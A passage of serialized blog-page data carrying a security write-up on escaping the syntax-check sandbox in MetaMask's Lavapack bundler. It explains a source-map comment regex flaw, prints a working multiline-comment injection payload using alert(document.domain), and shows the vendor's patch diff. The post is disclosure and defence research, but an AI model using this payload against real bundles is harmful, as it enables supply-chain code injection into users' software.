'STOP') return undefined;\n    if (err.constructor.name !== 'SyntaxError') return err;\n    return errorInfo(src, file, opts);\n}\n",[47945],{"type":28,"tag":98,"props":47946,"children":47947},{"__ignoreMap":7},[47948,47960,48008,48019,48026,48046,48087,48147,48188],{"type":28,"tag":116,"props":47949,"children":47950},{"class":245,"line":246},[47951,47956],{"type":28,"tag":116,"props":47952,"children":47953},{"style":260},[47954],{"type":33,"value":47955},"try",{"type":28,"tag":116,"props":47957,"children":47958},{"style":266},[47959],{"type":33,"value":1291},{"type":28,"tag":116,"props":47961,"children":47962},{"class":245,"line":256},[47963,47968,47972,47977,47981,47986,47990,47995,47999,48004],{"type":28,"tag":116,"props":47964,"children":47965},{"style":282},[47966],{"type":33,"value":47967},"    eval",{"type":28,"tag":116,"props":47969,"children":47970},{"style":266},[47971],{"type":33,"value":313},{"type":28,"tag":116,"props":47973,"children":47974},{"style":563},[47975],{"type":33,"value":47976},"'throw \"STOP\"; (function () { '",{"type":28,"tag":116,"props":47978,"children":47979},{"style":370},[47980],{"type":33,"value":2258},{"type":28,"tag":116,"props":47982,"children":47983},{"style":272},[47984],{"type":33,"value":47985}," src",{"type":28,"tag":116,"props":47987,"children":47988},{"style":370},[47989],{"type":33,"value":2258},{"type":28,"tag":116,"props":47991,"children":47992},{"style":563},[47993],{"type":33,"value":47994}," '",{"type":28,"tag":116,"props":47996,"children":47997},{"style":1836},[47998],{"type":33,"value":1839},{"type":28,"tag":116,"props":48000,"children":48001},{"style":563},[48002],{"type":33,"value":48003},"})()'",{"type":28,"tag":116,"props":48005,"children":48006},{"style":266},[48007],{"type":33,"value":895},{"type":28,"tag":116,"props":48009,"children":48010},{"class":245,"line":293},[48011,48015],{"type":28,"tag":116,"props":48012,"children":48013},{"style":260},[48014],{"type":33,"value":393},{"type":28,"tag":116,"props":48016,"children":48017},{"style":266},[48018],{"type":33,"value":384},{"type":28,"tag":116,"props":48020,"children":48021},{"class":245,"line":361},[48022],{"type":28,"tag":116,"props":48023,"children":48024},{"style":266},[48025],{"type":33,"value":406},{"type":28,"tag":116,"props":48027,"children":48028},{"class":245,"line":387},[48029,48034,48038,48042],{"type":28,"tag":116,"props":48030,"children":48031},{"style":260},[48032],{"type":33,"value":48033},"catch",{"type":28,"tag":116,"props":48035,"children":48036},{"style":266},[48037],{"type":33,"value":269},{"type":28,"tag":116,"props":48039,"children":48040},{"style":272},[48041],{"type":33,"value":1907},{"type":28,"tag":116,"props":48043,"children":48044},{"style":266},[48045],{"type":33,"value":844},{"type":28,"tag":116,"props":48047,"children":48048},{"class":245,"line":400},[48049,48053,48057,48061,48065,48070,48074,48079,48083],{"type":28,"tag":116,"props":48050,"children":48051},{"style":260},[48052],{"type":33,"value":11947},{"type":28,"tag":116,"props":48054,"children":48055},{"style":266},[48056],{"type":33,"value":269},{"type":28,"tag":116,"props":48058,"children":48059},{"style":272},[48060],{"type":33,"value":1907},{"type":28,"tag":116,"props":48062,"children":48063},{"style":370},[48064],{"type":33,"value":31073},{"type":28,"tag":116,"props":48066,"children":48067},{"style":563},[48068],{"type":33,"value":48069}," 'STOP'",{"type":28,"tag":116,"props":48071,"children":48072},{"style":266},[48073],{"type":33,"value":1609},{"type":28,"tag":116,"props":48075,"children":48076},{"style":260},[48077],{"type":33,"value":48078},"return",{"type":28,"tag":116,"props":48080,"children":48081},{"style":376},[48082],{"type":33,"value":38958},{"type":28,"tag":116,"props":48084,"children":48085},{"style":266},[48086],{"type":33,"value":384},{"type":28,"tag":116,"props":48088,"children":48089},{"class":245,"line":614},[48090,48094,48098,48102,48106,48111,48115,48120,48125,48130,48134,48138,48143],{"type":28,"tag":116,"props":48091,"children":48092},{"style":260},[48093],{"type":33,"value":11947},{"type":28,"tag":116,"props":48095,"children":48096},{"style":266},[48097],{"type":33,"value":269},{"type":28,"tag":116,"props":48099,"children":48100},{"style":272},[48101],{"type":33,"value":1907},{"type":28,"tag":116,"props":48103,"children":48104},{"style":266},[48105],{"type":33,"value":141},{"type":28,"tag":116,"props":48107,"children":48108},{"style":272},[48109],{"type":33,"value":48110},"constructor",{"type":28,"tag":116,"props":48112,"children":48113},{"style":266},[48114],{"type":33,"value":141},{"type":28,"tag":116,"props":48116,"children":48117},{"style":272},[48118],{"type":33,"value":48119},"name",{"type":28,"tag":116,"props":48121,"children":48122},{"style":370},[48123],{"type":33,"value":48124}," !==",{"type":28,"tag":116,"props":48126,"children":48127},{"style":563},[48128],{"type":33,"value":48129}," 'SyntaxError'",{"type":28,"tag":116,"props":48131,"children":48132},{"style":266},[48133],{"type":33,"value":1609},{"type":28,"tag":116,"props":48135,"children":48136},{"style":260},[48137],{"type":33,"value":48078},{"type":28,"tag":116,"props":48139,"children":48140},{"style":272},[48141],{"type":33,"value":48142}," err",{"type":28,"tag":116,"props":48144,"children":48145},{"style":266},[48146],{"type":33,"value":384},{"type":28,"tag":116,"props":48148,"children":48149},{"class":245,"line":631},[48150,48154,48159,48163,48167,48171,48175,48179,48184],{"type":28,"tag":116,"props":48151,"children":48152},{"style":260},[48153],{"type":33,"value":393},{"type":28,"tag":116,"props":48155,"children":48156},{"style":282},[48157],{"type":33,"value":48158}," errorInfo",{"type":28,"tag":116,"props":48160,"children":48161},{"style":266},[48162],{"type":33,"value":313},{"type":28,"tag":116,"props":48164,"children":48165},{"style":272},[48166],{"type":33,"value":1635},{"type":28,"tag":116,"props":48168,"children":48169},{"style":266},[48170],{"type":33,"value":825},{"type":28,"tag":116,"props":48172,"children":48173},{"style":272},[48174],{"type":33,"value":47569},{"type":28,"tag":116,"props":48176,"children":48177},{"style":266},[48178],{"type":33,"value":825},{"type":28,"tag":116,"props":48180,"children":48181},{"style":272},[48182],{"type":33,"value":48183},"opts",{"type":28,"tag":116,"props":48185,"children":48186},{"style":266},[48187],{"type":33,"value":895},{"type":28,"tag":116,"props":48189,"children":48190},{"class":245,"line":665},[48191],{"type":28,"tag":116,"props":48192,"children":48193},{"style":266},[48194],{"type":33,"value":406},{"type":28,"tag":29,"props":48196,"children":48197},{},[48198,48200,48204,48206,48212,48214,48219],{"type":33,"value":48199},"Interestingly, it ",{"type":28,"tag":2583,"props":48201,"children":48202},{},[48203],{"type":33,"value":3643},{"type":33,"value":48205}," possible to inject a ",{"type":28,"tag":98,"props":48207,"children":48209},{"className":48208},[],[48210],{"type":33,"value":48211},"}); (() => {",{"type":33,"value":48213}," inside source, and will not throw a syntax error. Unfortunately, this is not enough to bypass the ",{"type":28,"tag":98,"props":48215,"children":48217},{"className":48216},[],[48218],{"type":33,"value":47738},{"type":33,"value":48220}," sandbox of Lavapack.",{"type":28,"tag":75,"props":48222,"children":48224},{"id":48223},"sourcemap-the-syntax-killer",[48225],{"type":33,"value":48226},"SourceMap: The Syntax Killer",{"type":28,"tag":29,"props":48228,"children":48229},{},[48230,48232,48239],{"type":33,"value":48231},"Lavapack has a feature to extract source maps files from the code using ",{"type":28,"tag":87,"props":48233,"children":48236},{"href":48234,"rel":48235},"https://www.npmjs.com/package/convert-source-map",[91],[48237],{"type":33,"value":48238},"convert-source-map",{"type":33,"value":48240}," npm package:",{"type":28,"tag":234,"props":48242,"children":48244},{"className":31015,"code":48243,"language":31017,"meta":7,"style":7},"function extractSourceMaps(sourceCode) {\n  const converter = convertSourceMap.fromSource(sourceCode)\n  // if (!converter) throw new Error('Unable to find original inlined sourcemap')\n  const maps = converter && converter.toObject()\n  const code = convertSourceMap.removeComments(sourceCode)\n  return { code, maps }\n}\n",[48245],{"type":28,"tag":98,"props":48246,"children":48247},{"__ignoreMap":7},[48248,48272,48314,48322,48363,48404,48432],{"type":28,"tag":116,"props":48249,"children":48250},{"class":245,"line":246},[48251,48255,48260,48264,48268],{"type":28,"tag":116,"props":48252,"children":48253},{"style":376},[48254],{"type":33,"value":830},{"type":28,"tag":116,"props":48256,"children":48257},{"style":282},[48258],{"type":33,"value":48259}," extractSourceMaps",{"type":28,"tag":116,"props":48261,"children":48262},{"style":266},[48263],{"type":33,"value":313},{"type":28,"tag":116,"props":48265,"children":48266},{"style":272},[48267],{"type":33,"value":37637},{"type":28,"tag":116,"props":48269,"children":48270},{"style":266},[48271],{"type":33,"value":844},{"type":28,"tag":116,"props":48273,"children":48274},{"class":245,"line":256},[48275,48279,48284,48288,48293,48297,48302,48306,48310],{"type":28,"tag":116,"props":48276,"children":48277},{"style":376},[48278],{"type":33,"value":35814},{"type":28,"tag":116,"props":48280,"children":48281},{"style":272},[48282],{"type":33,"value":48283}," converter",{"type":28,"tag":116,"props":48285,"children":48286},{"style":370},[48287],{"type":33,"value":2226},{"type":28,"tag":116,"props":48289,"children":48290},{"style":272},[48291],{"type":33,"value":48292}," convertSourceMap",{"type":28,"tag":116,"props":48294,"children":48295},{"style":266},[48296],{"type":33,"value":141},{"type":28,"tag":116,"props":48298,"children":48299},{"style":282},[48300],{"type":33,"value":48301},"fromSource",{"type":28,"tag":116,"props":48303,"children":48304},{"style":266},[48305],{"type":33,"value":313},{"type":28,"tag":116,"props":48307,"children":48308},{"style":272},[48309],{"type":33,"value":37637},{"type":28,"tag":116,"props":48311,"children":48312},{"style":266},[48313],{"type":33,"value":2830},{"type":28,"tag":116,"props":48315,"children":48316},{"class":245,"line":293},[48317],{"type":28,"tag":116,"props":48318,"children":48319},{"style":250},[48320],{"type":33,"value":48321},"  // if (!converter) throw new Error('Unable to find original inlined sourcemap')\n",{"type":28,"tag":116,"props":48323,"children":48324},{"class":245,"line":361},[48325,48329,48334,48338,48342,48346,48350,48354,48359],{"type":28,"tag":116,"props":48326,"children":48327},{"style":376},[48328],{"type":33,"value":35814},{"type":28,"tag":116,"props":48330,"children":48331},{"style":272},[48332],{"type":33,"value":48333}," maps",{"type":28,"tag":116,"props":48335,"children":48336},{"style":370},[48337],{"type":33,"value":2226},{"type":28,"tag":116,"props":48339,"children":48340},{"style":272},[48341],{"type":33,"value":48283},{"type":28,"tag":116,"props":48343,"children":48344},{"style":370},[48345],{"type":33,"value":13851},{"type":28,"tag":116,"props":48347,"children":48348},{"style":272},[48349],{"type":33,"value":48283},{"type":28,"tag":116,"props":48351,"children":48352},{"style":266},[48353],{"type":33,"value":141},{"type":28,"tag":116,"props":48355,"children":48356},{"style":282},[48357],{"type":33,"value":48358},"toObject",{"type":28,"tag":116,"props":48360,"children":48361},{"style":266},[48362],{"type":33,"value":7407},{"type":28,"tag":116,"props":48364,"children":48365},{"class":245,"line":387},[48366,48370,48375,48379,48383,48387,48392,48396,48400],{"type":28,"tag":116,"props":48367,"children":48368},{"style":376},[48369],{"type":33,"value":35814},{"type":28,"tag":116,"props":48371,"children":48372},{"style":272},[48373],{"type":33,"value":48374}," code",{"type":28,"tag":116,"props":48376,"children":48377},{"style":370},[48378],{"type":33,"value":2226},{"type":28,"tag":116,"props":48380,"children":48381},{"style":272},[48382],{"type":33,"value":48292},{"type":28,"tag":116,"props":48384,"children":48385},{"style":266},[48386],{"type":33,"value":141},{"type":28,"tag":116,"props":48388,"children":48389},{"style":282},[48390],{"type":33,"value":48391},"removeComments",{"type":28,"tag":116,"props":48393,"children":48394},{"style":266},[48395],{"type":33,"value":313},{"type":28,"tag":116,"props":48397,"children":48398},{"style":272},[48399],{"type":33,"value":37637},{"type":28,"tag":116,"props":48401,"children":48402},{"style":266},[48403],{"type":33,"value":2830},{"type":28,"tag":116,"props":48405,"children":48406},{"class":245,"line":400},[48407,48411,48415,48419,48423,48428],{"type":28,"tag":116,"props":48408,"children":48409},{"style":260},[48410],{"type":33,"value":38820},{"type":28,"tag":116,"props":48412,"children":48413},{"style":266},[48414],{"type":33,"value":9254},{"type":28,"tag":116,"props":48416,"children":48417},{"style":272},[48418],{"type":33,"value":98},{"type":28,"tag":116,"props":48420,"children":48421},{"style":266},[48422],{"type":33,"value":825},{"type":28,"tag":116,"props":48424,"children":48425},{"style":272},[48426],{"type":33,"value":48427},"maps",{"type":28,"tag":116,"props":48429,"children":48430},{"style":266},[48431],{"type":33,"value":9264},{"type":28,"tag":116,"props":48433,"children":48434},{"class":245,"line":614},[48435],{"type":28,"tag":116,"props":48436,"children":48437},{"style":266},[48438],{"type":33,"value":406},{"type":28,"tag":29,"props":48440,"children":48441},{},[48442,48444,48449,48451,48456],{"type":33,"value":48443},"This code removes the source map comments of the source code, meaning that there actually is a modification of source code in Lavapack after the ",{"type":28,"tag":98,"props":48445,"children":48447},{"className":48446},[],[48448],{"type":33,"value":47889},{"type":33,"value":48450}," stage. Reviewing the ",{"type":28,"tag":98,"props":48452,"children":48454},{"className":48453},[],[48455],{"type":33,"value":48238},{"type":33,"value":48457}," code, we can see exactly how this happens.",{"type":28,"tag":234,"props":48459,"children":48461},{"className":31015,"code":48460,"language":31017,"meta":7,"style":7},"Object.defineProperty(exports, 'commentRegex', {\n  get: function getCommentRegex () {\n    // Groups: 1: media type, 2: MIME type, 3: charset, 4: encoding, 5: data.\n    return /^\\s*?\\/[\\/\\*][@#]\\s+?sourceMappingURL=data:(((?:application|text)\\/json)(?:;charset=([^;,]+?)?)?)?(?:;(base64))?,(.*?)$/mg;\n  }\n});\n\nexports.removeComments = function (src) {\n  return src.replace(exports.commentRegex, '');\n};\n",[48462],{"type":28,"tag":98,"props":48463,"children":48464},{"__ignoreMap":7},[48465,48504,48530,48538,48752,48759,48766,48773,48808,48858],{"type":28,"tag":116,"props":48466,"children":48467},{"class":245,"line":246},[48468,48473,48477,48482,48486,48490,48494,48499],{"type":28,"tag":116,"props":48469,"children":48470},{"style":272},[48471],{"type":33,"value":48472},"Object",{"type":28,"tag":116,"props":48474,"children":48475},{"style":266},[48476],{"type":33,"value":141},{"type":28,"tag":116,"props":48478,"children":48479},{"style":282},[48480],{"type":33,"value":48481},"defineProperty",{"type":28,"tag":116,"props":48483,"children":48484},{"style":266},[48485],{"type":33,"value":313},{"type":28,"tag":116,"props":48487,"children":48488},{"style":339},[48489],{"type":33,"value":37509},{"type":28,"tag":116,"props":48491,"children":48492},{"style":266},[48493],{"type":33,"value":825},{"type":28,"tag":116,"props":48495,"children":48496},{"style":563},[48497],{"type":33,"value":48498},"'commentRegex'",{"type":28,"tag":116,"props":48500,"children":48501},{"style":266},[48502],{"type":33,"value":48503},", {\n",{"type":28,"tag":116,"props":48505,"children":48506},{"class":245,"line":256},[48507,48512,48516,48520,48525],{"type":28,"tag":116,"props":48508,"children":48509},{"style":282},[48510],{"type":33,"value":48511},"  get",{"type":28,"tag":116,"props":48513,"children":48514},{"style":272},[48515],{"type":33,"value":4160},{"type":28,"tag":116,"props":48517,"children":48518},{"style":376},[48519],{"type":33,"value":1058},{"type":28,"tag":116,"props":48521,"children":48522},{"style":282},[48523],{"type":33,"value":48524}," getCommentRegex",{"type":28,"tag":116,"props":48526,"children":48527},{"style":266},[48528],{"type":33,"value":48529}," () {\n",{"type":28,"tag":116,"props":48531,"children":48532},{"class":245,"line":293},[48533],{"type":28,"tag":116,"props":48534,"children":48535},{"style":250},[48536],{"type":33,"value":48537},"    // Groups: 1: media type, 2: MIME type, 3: charset, 4: encoding, 5: data.\n",{"type":28,"tag":116,"props":48539,"children":48540},{"class":245,"line":361},[48541,48545,48551,48556,48561,48566,48570,48575,48580,48585,48589,48593,48598,48603,48608,48613,48617,48621,48625,48630,48634,48639,48644,48649,48654,48658,48662,48666,48670,48674,48678,48682,48686,48691,48696,48700,48705,48710,48714,48718,48722,48726,48731,48735,48739,48743,48748],{"type":28,"tag":116,"props":48542,"children":48543},{"style":260},[48544],{"type":33,"value":393},{"type":28,"tag":116,"props":48546,"children":48548},{"style":48547},"--shiki-default:#D16969",[48549],{"type":33,"value":48550}," /",{"type":28,"tag":116,"props":48552,"children":48553},{"style":282},[48554],{"type":33,"value":48555},"^",{"type":28,"tag":116,"props":48557,"children":48558},{"style":48547},[48559],{"type":33,"value":48560},"\\s",{"type":28,"tag":116,"props":48562,"children":48563},{"style":1836},[48564],{"type":33,"value":48565},"*?\\/",{"type":28,"tag":116,"props":48567,"children":48568},{"style":563},[48569],{"type":33,"value":347},{"type":28,"tag":116,"props":48571,"children":48572},{"style":1836},[48573],{"type":33,"value":48574},"\\/\\*",{"type":28,"tag":116,"props":48576,"children":48577},{"style":563},[48578],{"type":33,"value":48579},"][",{"type":28,"tag":116,"props":48581,"children":48582},{"style":48547},[48583],{"type":33,"value":48584},"@#",{"type":28,"tag":116,"props":48586,"children":48587},{"style":563},[48588],{"type":33,"value":15074},{"type":28,"tag":116,"props":48590,"children":48591},{"style":48547},[48592],{"type":33,"value":48560},{"type":28,"tag":116,"props":48594,"children":48595},{"style":1836},[48596],{"type":33,"value":48597},"+?",{"type":28,"tag":116,"props":48599,"children":48600},{"style":48547},[48601],{"type":33,"value":48602},"sourceMappingURL=data:",{"type":28,"tag":116,"props":48604,"children":48605},{"style":563},[48606],{"type":33,"value":48607},"(((?:",{"type":28,"tag":116,"props":48609,"children":48610},{"style":48547},[48611],{"type":33,"value":48612},"application",{"type":28,"tag":116,"props":48614,"children":48615},{"style":282},[48616],{"type":33,"value":10083},{"type":28,"tag":116,"props":48618,"children":48619},{"style":48547},[48620],{"type":33,"value":33},{"type":28,"tag":116,"props":48622,"children":48623},{"style":563},[48624],{"type":33,"value":1829},{"type":28,"tag":116,"props":48626,"children":48627},{"style":1836},[48628],{"type":33,"value":48629},"\\/",{"type":28,"tag":116,"props":48631,"children":48632},{"style":48547},[48633],{"type":33,"value":33632},{"type":28,"tag":116,"props":48635,"children":48636},{"style":563},[48637],{"type":33,"value":48638},")(?:",{"type":28,"tag":116,"props":48640,"children":48641},{"style":48547},[48642],{"type":33,"value":48643},";charset=",{"type":28,"tag":116,"props":48645,"children":48646},{"style":563},[48647],{"type":33,"value":48648},"([^",{"type":28,"tag":116,"props":48650,"children":48651},{"style":48547},[48652],{"type":33,"value":48653},";,",{"type":28,"tag":116,"props":48655,"children":48656},{"style":563},[48657],{"type":33,"value":15074},{"type":28,"tag":116,"props":48659,"children":48660},{"style":1836},[48661],{"type":33,"value":48597},{"type":28,"tag":116,"props":48663,"children":48664},{"style":563},[48665],{"type":33,"value":1829},{"type":28,"tag":116,"props":48667,"children":48668},{"style":1836},[48669],{"type":33,"value":2825},{"type":28,"tag":116,"props":48671,"children":48672},{"style":563},[48673],{"type":33,"value":1829},{"type":28,"tag":116,"props":48675,"children":48676},{"style":1836},[48677],{"type":33,"value":2825},{"type":28,"tag":116,"props":48679,"children":48680},{"style":563},[48681],{"type":33,"value":1829},{"type":28,"tag":116,"props":48683,"children":48684},{"style":1836},[48685],{"type":33,"value":2825},{"type":28,"tag":116,"props":48687,"children":48688},{"style":563},[48689],{"type":33,"value":48690},"(?:",{"type":28,"tag":116,"props":48692,"children":48693},{"style":48547},[48694],{"type":33,"value":48695},";",{"type":28,"tag":116,"props":48697,"children":48698},{"style":563},[48699],{"type":33,"value":313},{"type":28,"tag":116,"props":48701,"children":48702},{"style":48547},[48703],{"type":33,"value":48704},"base64",{"type":28,"tag":116,"props":48706,"children":48707},{"style":563},[48708],{"type":33,"value":48709},"))",{"type":28,"tag":116,"props":48711,"children":48712},{"style":1836},[48713],{"type":33,"value":2825},{"type":28,"tag":116,"props":48715,"children":48716},{"style":48547},[48717],{"type":33,"value":3794},{"type":28,"tag":116,"props":48719,"children":48720},{"style":563},[48721],{"type":33,"value":313},{"type":28,"tag":116,"props":48723,"children":48724},{"style":48547},[48725],{"type":33,"value":141},{"type":28,"tag":116,"props":48727,"children":48728},{"style":1836},[48729],{"type":33,"value":48730},"*?",{"type":28,"tag":116,"props":48732,"children":48733},{"style":563},[48734],{"type":33,"value":1829},{"type":28,"tag":116,"props":48736,"children":48737},{"style":282},[48738],{"type":33,"value":9956},{"type":28,"tag":116,"props":48740,"children":48741},{"style":48547},[48742],{"type":33,"value":4250},{"type":28,"tag":116,"props":48744,"children":48745},{"style":376},[48746],{"type":33,"value":48747},"mg",{"type":28,"tag":116,"props":48749,"children":48750},{"style":266},[48751],{"type":33,"value":384},{"type":28,"tag":116,"props":48753,"children":48754},{"class":245,"line":387},[48755],{"type":28,"tag":116,"props":48756,"children":48757},{"style":266},[48758],{"type":33,"value":5543},{"type":28,"tag":116,"props":48760,"children":48761},{"class":245,"line":400},[48762],{"type":28,"tag":116,"props":48763,"children":48764},{"style":266},[48765],{"type":33,"value":34964},{"type":28,"tag":116,"props":48767,"children":48768},{"class":245,"line":614},[48769],{"type":28,"tag":116,"props":48770,"children":48771},{"emptyLinePlaceholder":19},[48772],{"type":33,"value":1044},{"type":28,"tag":116,"props":48774,"children":48775},{"class":245,"line":631},[48776,48780,48784,48788,48792,48796,48800,48804],{"type":28,"tag":116,"props":48777,"children":48778},{"style":339},[48779],{"type":33,"value":37509},{"type":28,"tag":116,"props":48781,"children":48782},{"style":266},[48783],{"type":33,"value":141},{"type":28,"tag":116,"props":48785,"children":48786},{"style":282},[48787],{"type":33,"value":48391},{"type":28,"tag":116,"props":48789,"children":48790},{"style":370},[48791],{"type":33,"value":2226},{"type":28,"tag":116,"props":48793,"children":48794},{"style":376},[48795],{"type":33,"value":1058},{"type":28,"tag":116,"props":48797,"children":48798},{"style":266},[48799],{"type":33,"value":269},{"type":28,"tag":116,"props":48801,"children":48802},{"style":272},[48803],{"type":33,"value":1635},{"type":28,"tag":116,"props":48805,"children":48806},{"style":266},[48807],{"type":33,"value":844},{"type":28,"tag":116,"props":48809,"children":48810},{"class":245,"line":665},[48811,48815,48819,48823,48828,48832,48836,48840,48845,48849,48854],{"type":28,"tag":116,"props":48812,"children":48813},{"style":260},[48814],{"type":33,"value":38820},{"type":28,"tag":116,"props":48816,"children":48817},{"style":272},[48818],{"type":33,"value":47985},{"type":28,"tag":116,"props":48820,"children":48821},{"style":266},[48822],{"type":33,"value":141},{"type":28,"tag":116,"props":48824,"children":48825},{"style":282},[48826],{"type":33,"value":48827},"replace",{"type":28,"tag":116,"props":48829,"children":48830},{"style":266},[48831],{"type":33,"value":313},{"type":28,"tag":116,"props":48833,"children":48834},{"style":339},[48835],{"type":33,"value":37509},{"type":28,"tag":116,"props":48837,"children":48838},{"style":266},[48839],{"type":33,"value":141},{"type":28,"tag":116,"props":48841,"children":48842},{"style":272},[48843],{"type":33,"value":48844},"commentRegex",{"type":28,"tag":116,"props":48846,"children":48847},{"style":266},[48848],{"type":33,"value":825},{"type":28,"tag":116,"props":48850,"children":48851},{"style":563},[48852],{"type":33,"value":48853},"''",{"type":28,"tag":116,"props":48855,"children":48856},{"style":266},[48857],{"type":33,"value":895},{"type":28,"tag":116,"props":48859,"children":48860},{"class":245,"line":713},[48861],{"type":28,"tag":116,"props":48862,"children":48863},{"style":266},[48864],{"type":33,"value":16239},{"type":28,"tag":29,"props":48866,"children":48867},{},[48868,48870,48876],{"type":33,"value":48869},"Looking deeper at the RegEx, it matches the start of the multiple line comment (",{"type":28,"tag":98,"props":48871,"children":48873},{"className":48872},[],[48874],{"type":33,"value":48875},"/*",{"type":33,"value":48877},") but doesn't match the end of it, meaning that the syntax would break in the case of multiline source map comments.",{"type":28,"tag":75,"props":48879,"children":48881},{"id":48880},"the-bypass",[48882],{"type":33,"value":48883},"The Bypass",{"type":28,"tag":29,"props":48885,"children":48886},{},[48887,48889,48894,48896,48901],{"type":33,"value":48888},"By abusing the ",{"type":28,"tag":98,"props":48890,"children":48892},{"className":48891},[],[48893],{"type":33,"value":48391},{"type":33,"value":48895}," function, we could bypass the Lavamoat restrictions by escaping the ",{"type":28,"tag":98,"props":48897,"children":48899},{"className":48898},[],[48900],{"type":33,"value":47738},{"type":33,"value":48902}," sandbox. To do so, we created a multiline source map comment, and injected the invalid javascript inside the comment:",{"type":28,"tag":234,"props":48904,"children":48906},{"className":31015,"code":48905,"language":31017,"meta":7,"style":7},"/*# sourceMappingURL=data:,{}\n\n}}}}\n}, {\n    package: \"xpl\",\n    file: \"node_modules/xpl/index.js\",\n    test: alert(document.domain),\n    test1: () => { () => { () => { () => {\n\n/*\n*/\n",[48907],{"type":28,"tag":98,"props":48908,"children":48909},{"__ignoreMap":7},[48910,48918,48925,48933,48941,48949,48957,48965,48973,48980,48988],{"type":28,"tag":116,"props":48911,"children":48912},{"class":245,"line":246},[48913],{"type":28,"tag":116,"props":48914,"children":48915},{"style":250},[48916],{"type":33,"value":48917},"/*# sourceMappingURL=data:,{}\n",{"type":28,"tag":116,"props":48919,"children":48920},{"class":245,"line":256},[48921],{"type":28,"tag":116,"props":48922,"children":48923},{"emptyLinePlaceholder":19},[48924],{"type":33,"value":1044},{"type":28,"tag":116,"props":48926,"children":48927},{"class":245,"line":293},[48928],{"type":28,"tag":116,"props":48929,"children":48930},{"style":250},[48931],{"type":33,"value":48932},"}}}}\n",{"type":28,"tag":116,"props":48934,"children":48935},{"class":245,"line":361},[48936],{"type":28,"tag":116,"props":48937,"children":48938},{"style":250},[48939],{"type":33,"value":48940},"}, {\n",{"type":28,"tag":116,"props":48942,"children":48943},{"class":245,"line":387},[48944],{"type":28,"tag":116,"props":48945,"children":48946},{"style":250},[48947],{"type":33,"value":48948},"    package: \"xpl\",\n",{"type":28,"tag":116,"props":48950,"children":48951},{"class":245,"line":400},[48952],{"type":28,"tag":116,"props":48953,"children":48954},{"style":250},[48955],{"type":33,"value":48956},"    file: \"node_modules/xpl/index.js\",\n",{"type":28,"tag":116,"props":48958,"children":48959},{"class":245,"line":614},[48960],{"type":28,"tag":116,"props":48961,"children":48962},{"style":250},[48963],{"type":33,"value":48964},"    test: alert(document.domain),\n",{"type":28,"tag":116,"props":48966,"children":48967},{"class":245,"line":631},[48968],{"type":28,"tag":116,"props":48969,"children":48970},{"style":250},[48971],{"type":33,"value":48972},"    test1: () => { () => { () => { () => {\n",{"type":28,"tag":116,"props":48974,"children":48975},{"class":245,"line":665},[48976],{"type":28,"tag":116,"props":48977,"children":48978},{"emptyLinePlaceholder":19},[48979],{"type":33,"value":1044},{"type":28,"tag":116,"props":48981,"children":48982},{"class":245,"line":713},[48983],{"type":28,"tag":116,"props":48984,"children":48985},{"style":250},[48986],{"type":33,"value":48987},"/*\n",{"type":28,"tag":116,"props":48989,"children":48990},{"class":245,"line":750},[48991],{"type":28,"tag":116,"props":48992,"children":48993},{"style":250},[48994],{"type":33,"value":48995},"*/\n",{"type":28,"tag":29,"props":48997,"children":48998},{},[48999],{"type":33,"value":49000},"This allows malicious code to execute without breaking any other package or feature. This payload also makes the supply chain attack more impactful. Any injected code is executed as soon as the bundle file is imported.",{"type":28,"tag":75,"props":49002,"children":49004},{"id":49003},"lavapack-patch",[49005],{"type":33,"value":49006},"Lavapack Patch",{"type":28,"tag":29,"props":49008,"children":49009},{},[49010,49012,49018],{"type":33,"value":49011},"Metamask mitigated the issues we reported on Lavapack by defining ",{"type":28,"tag":98,"props":49013,"children":49015},{"className":49014},[],[49016],{"type":33,"value":49017},"assertValidJS",{"type":33,"value":49019},", an independent check that differs from the browserify syntax check we used to exploit the issue.",{"type":28,"tag":29,"props":49021,"children":49022},{},[49023,49025,49032],{"type":33,"value":49024},"The patch was introduced in commit ",{"type":28,"tag":87,"props":49026,"children":49029},{"href":49027,"rel":49028},"https://github.com/LavaMoat/LavaMoat/commit/9c38cd47e7875dde53349dd34971c74ce34004d9",[91],[49030],{"type":33,"value":49031},"9c38cd4",{"type":33,"value":141},{"type":28,"tag":234,"props":49034,"children":49036},{"className":39980,"code":49035,"language":39982,"meta":7,"style":7},"+ function assertValidJS(code) {\n+  try {\n+    new Function(code)\n+  } catch (err) {\n+    throw new Error(`Invalid JavaScript: ${err.message}`)\n+  }\n+ }\n\n+  // additional layer of syntax checking independent of browserify\n+  assertValidJS(sourceMeta.code) \n\n",[49037],{"type":28,"tag":98,"props":49038,"children":49039},{"__ignoreMap":7},[49040,49048,49056,49064,49072,49080,49088,49096,49103,49111],{"type":28,"tag":116,"props":49041,"children":49042},{"class":245,"line":246},[49043],{"type":28,"tag":116,"props":49044,"children":49045},{"style":350},[49046],{"type":33,"value":49047},"+ function assertValidJS(code) {\n",{"type":28,"tag":116,"props":49049,"children":49050},{"class":245,"line":256},[49051],{"type":28,"tag":116,"props":49052,"children":49053},{"style":350},[49054],{"type":33,"value":49055},"+  try {\n",{"type":28,"tag":116,"props":49057,"children":49058},{"class":245,"line":293},[49059],{"type":28,"tag":116,"props":49060,"children":49061},{"style":350},[49062],{"type":33,"value":49063},"+    new Function(code)\n",{"type":28,"tag":116,"props":49065,"children":49066},{"class":245,"line":361},[49067],{"type":28,"tag":116,"props":49068,"children":49069},{"style":350},[49070],{"type":33,"value":49071},"+  } catch (err) {\n",{"type":28,"tag":116,"props":49073,"children":49074},{"class":245,"line":387},[49075],{"type":28,"tag":116,"props":49076,"children":49077},{"style":350},[49078],{"type":33,"value":49079},"+    throw new Error(`Invalid JavaScript: ${err.message}`)\n",{"type":28,"tag":116,"props":49081,"children":49082},{"class":245,"line":400},[49083],{"type":28,"tag":116,"props":49084,"children":49085},{"style":350},[49086],{"type":33,"value":49087},"+  }\n",{"type":28,"tag":116,"props":49089,"children":49090},{"class":245,"line":614},[49091],{"type":28,"tag":116,"props":49092,"children":49093},{"style":350},[49094],{"type":33,"value":49095},"+ }\n",{"type":28,"tag":116,"props":49097,"children":49098},{"class":245,"line":631},[49099],{"type":28,"tag":116,"props":49100,"children":49101},{"emptyLinePlaceholder":19},[49102],{"type":33,"value":1044},{"type":28,"tag":116,"props":49104,"children":49105},{"class":245,"line":665},[49106],{"type":28,"tag":116,"props":49107,"children":49108},{"style":350},[49109],{"type":33,"value":49110},"+  // additional layer of syntax checking independent of browserify\n",{"type":28,"tag":116,"props":49112,"children":49113},{"class":245,"line":713},[49114],{"type":28,"tag":116,"props":49115,"children":49116},{"style":350},[49117],{"type":33,"value":49118},"+  